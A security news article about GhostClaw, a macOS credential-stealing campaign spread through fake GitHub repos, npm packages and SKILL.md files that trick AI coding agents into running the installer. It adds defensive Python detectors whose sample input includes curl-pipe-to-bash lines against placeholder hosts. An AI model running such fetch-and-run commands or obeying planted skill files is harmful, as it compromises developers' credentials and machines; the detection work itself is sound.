GhostClaw AI Malware Targets macOS Users, Steals Credentials
Key Takeaways
- A new macOS malware, GhostClaw, is actively targeting developers via fake GitHub repositories and malicious npm packages.
- It employs social engineering and can leverage AI coding agents for infection without direct human interaction.
- GhostClaw steals user credentials, establishes persistence, and downloads secondary payloads.
- Defenders should scrutinize installation commands, monitor for unusual `dscl` usage, and verify code origins.
A sophisticated new malware campaign, dubbed GhostClaw, has emerged, specifically designed to compromise macOS systems by exploiting developer workflows and, notably, AI-assisted development environments. Threat actors are deploying this malware through deceptive GitHub repositories and malicious software packages, masquerading as legitimate development tools to steal user credentials and deploy additional malicious payloads.
Evolution of the Campaign
The GhostClaw operation first came to light in early March 2026, when JFrog Security Research initially documented it under the names GhostClaw/GhostLoader. At its inception, the malware was primarily distributed through malicious npm packages, targeting developers who frequently incorporate third-party tools from public registries into their projects.
However, the campaign quickly broadened its reach beyond the npm ecosystem, transitioning to GitHub-hosted repositories. These repositories were meticulously crafted to impersonate popular developer resources such as trading bots, software development kits (SDKs), and other commonly used utilities, enhancing their perceived legitimacy.
Researchers at Jamf Threat Labs subsequently identified at least eight new samples linked to the same campaign after a thorough examination of multiple GitHub repositories. Their investigation uncovered extensive additional infrastructure and previously unknown infection vectors, confirming that GhostClaw had significantly expanded its delivery mechanisms beyond its initial npm-centric approach. A prime example of this deception was the “TradingView-Claw” repository, which garnered 386 GitHub stars, lending it a deceptive air of credibility among unsuspecting developers.
Dual-Path Infection Strategy
GhostClaw’s efficacy stems from its ingenious dual-pronged infection strategy. In one method, the malicious GitHub repositories contain README files that provide step-by-step installation instructions, guiding users to execute a shell command via `curl`.
The second, more advanced, infection vector targets AI coding agents. This is achieved through specially crafted `SKILL.md` files that define metadata and execution commands. These files are designed to trick automated development tools into unknowingly initiating the infection chain, enabling GhostClaw to compromise a system without any direct human interaction.
The broader implications of this campaign are significant, extending beyond individual developers. By embedding malicious code within trusted ecosystems like GitHub and leveraging AI-assisted tooling, attackers can achieve a far wider reach through a single delivery mechanism. Jamf Threat Labs also observed connections to other related campaigns, including Glassworm and PolinRider, which utilized similar software supply chain attack techniques. This trend highlights a growing sophistication in how threat actors distribute malware at scale.
Multi-Stage Infection and Credential Theft
Regardless of the initial infection vector, GhostClaw consistently follows a multi-stage execution chain engineered to harvest credentials and establish persistent access on the victim’s macOS system.
The infection commences with an `install.sh` script, which masquerades as a routine setup tool. This bootstrapper script first checks the host macOS version and architecture. It then silently installs a compatible version of Node.js into a user-controlled directory, cleverly circumventing the need for elevated administrative privileges. Notably, the script uses `curl` with the `--insecure` flag to download Node.js, a practice that bypasses TLS certificate verification and is rarely seen in legitimate installers.
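The `curl` usage described above can be checked for before any README command or install script is run. The following is an added example, not code from the campaign or from the researchers; the sample lines and `example.invalid` URLs are constructed, and the two "download executed directly" shapes are assumptions about what a shell command delivered via `curl` typically looks like.

```python
import re

# Text after each "curl" up to the next pipe or semicolon (its arguments).
CURL_ARGS = re.compile(r"\bcurl\b([^|;\n]*)")
# --insecure, or -k alone or bundled in a short-option cluster such as -fsSLk.
NO_TLS_VERIFY = re.compile(r"(?<!\S)(?:--insecure|-[A-Za-z]*k[A-Za-z]*)(?!\S)")
# Download handed straight to an interpreter (assumed shapes of such a command):
#   curl ... | bash          and          bash -c "$(curl ...)"
PIPE_TO_SHELL = re.compile(r"\bcurl\b[^|;\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
SUBST_TO_SHELL = re.compile(r"\b(?:ba|z)?sh\s+-c\s+[\"']?\$\(\s*curl\b")

def review_install_text(text):
    """Return (line_number, finding) pairs for risky curl usage in text."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if any(NO_TLS_VERIFY.search(m.group(1)) for m in CURL_ARGS.finditer(line)):
            findings.append((number, "tls-verification-disabled"))
        if PIPE_TO_SHELL.search(line) or SUBST_TO_SHELL.search(line):
            findings.append((number, "download-executed-directly"))
    return findings

# Constructed sample: lines as they might appear in a README or install script.
SAMPLE = """\
## Install
curl -fsSL https://example.invalid/sdk/install.sh | bash
curl --insecure -o node.tar.gz https://example.invalid/node.tar.gz
curl -fsSLk https://example.invalid/a.sh -o a.sh
/bin/bash -c "$(curl -fsSL https://example.invalid/b.sh)"
curl -fsSL -o tool.tar.gz https://example.invalid/tool.tar.gz
"""

if __name__ == "__main__":
    for number, finding in review_install_text(SAMPLE):
        print(f"line {number}: {finding}")
```

The patterns are heuristics for review, so a clean result does not show that a script is safe to run.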
Control then transfers to `setup.js`, a heavily obfuscated JavaScript file responsible for the critical task of credential collection. To avoid suspicion, the script clears the terminal screen and displays fake progress indicators, mimicking a legitimate SDK installation process.
Subsequently, a credential prompt appears. The password entered by the user is validated using the native macOS binary `dscl` with the `-authonly` option. This method allows the malware to confirm the validity of stolen credentials without triggering standard system authentication dialogs, which might otherwise alert the user.
If Full Disk Access has not already been granted, the malware presents AppleScript dialogs that closely mimic genuine macOS security prompts. These dialogs guide the user through the process of granting the necessary permissions in System Settings.
Once credentials are harvested and access is secured, `setup.js` communicates with its command-and-control (C2) server at `trackpipe[.]dev`. From here, it retrieves an encrypted secondary payload, which is temporarily written to `/tmp/sys-opt-{random}.js`. This temporary file is then deleted, and the malware establishes persistence by relocating itself to `~/.cache/.npm_telemetry/monitor.js` – a path strategically chosen to blend in with normal npm activity and evade detection.
What You Should Do
- Exercise extreme caution when executing installation commands from GitHub repositories, online guides, or any unverified source, even if they appear credible.
- Always verify the origin and expected behavior of any code before execution. Review scripts and package contents thoroughly.
- For security teams managing macOS environments, implement monitoring for unexpected usage of the `dscl` command, especially with the `-authonly` option, as this could indicate credential validation attempts by malware.
- Monitor for processes attempting to gain Full Disk Access or writing obfuscated files to temporary directories (`/tmp/`) or user cache directories (`~/.cache/`).
- Educate developers and users on the risks associated with supply chain attacks and the importance of scrutinizing third-party dependencies.
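The two monitoring recommendations above can be expressed as detection rules over endpoint telemetry. This is an added example, not tooling from Jamf, JFrog or this site; it assumes process and file events arrive as JSON lines, and the field names (`event`, `parent`, `argv`, `path`) and all sample events are constructed rather than taken from a real EDR schema.

```python
import json
import re

# /tmp is a symlink to /private/tmp on macOS, so telemetry may report either.
TMP_PAYLOAD = re.compile(r"^(?:/private)?/tmp/sys-opt-[^/]+\.js$")
PERSIST_SUFFIX = "/.cache/.npm_telemetry/monitor.js"

def classify(event):
    """Return the names of the rules one telemetry event matches."""
    hits = []
    kind = event.get("event")
    if kind == "exec":
        argv = event.get("argv") or [""]
        if argv[0].rsplit("/", 1)[-1] == "dscl" and "-authonly" in argv[1:]:
            # A Node.js parent is the chain the article describes (setup.js).
            parent = event.get("parent", "").rsplit("/", 1)[-1]
            hits.append("dscl-authonly-from-node" if parent == "node" else "dscl-authonly")
    elif kind in ("create", "rename"):
        path = event.get("path", "")
        if TMP_PAYLOAD.match(path):
            hits.append("tmp-sys-opt-js")
        if path.endswith(PERSIST_SUFFIX):
            hits.append("npm-telemetry-persistence")
    return hits

def scan(jsonl):
    """Return (line_number, rule_names) for every matching JSON line."""
    alerts = []
    for number, line in enumerate(jsonl.splitlines(), 1):
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed or blank lines
        hits = classify(event) if isinstance(event, dict) else []
        if hits:
            alerts.append((number, hits))
    return alerts

# Constructed events; the field names are hypothetical, not a real EDR schema.
SAMPLE = """\
{"event": "exec", "parent": "/Users/dev/.local/node/bin/node", "argv": ["/usr/bin/dscl", ".", "-authonly", "dev", "<redacted>"]}
{"event": "exec", "parent": "/bin/zsh", "argv": ["/usr/bin/dscl", ".", "-read", "/Users/dev"]}
{"event": "create", "path": "/private/tmp/sys-opt-8f3a.js"}
{"event": "rename", "path": "/Users/dev/.cache/.npm_telemetry/monitor.js"}
{"event": "create", "path": "/Users/dev/.npm/_cacache/index-v5/ab/cd"}
"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```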
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.


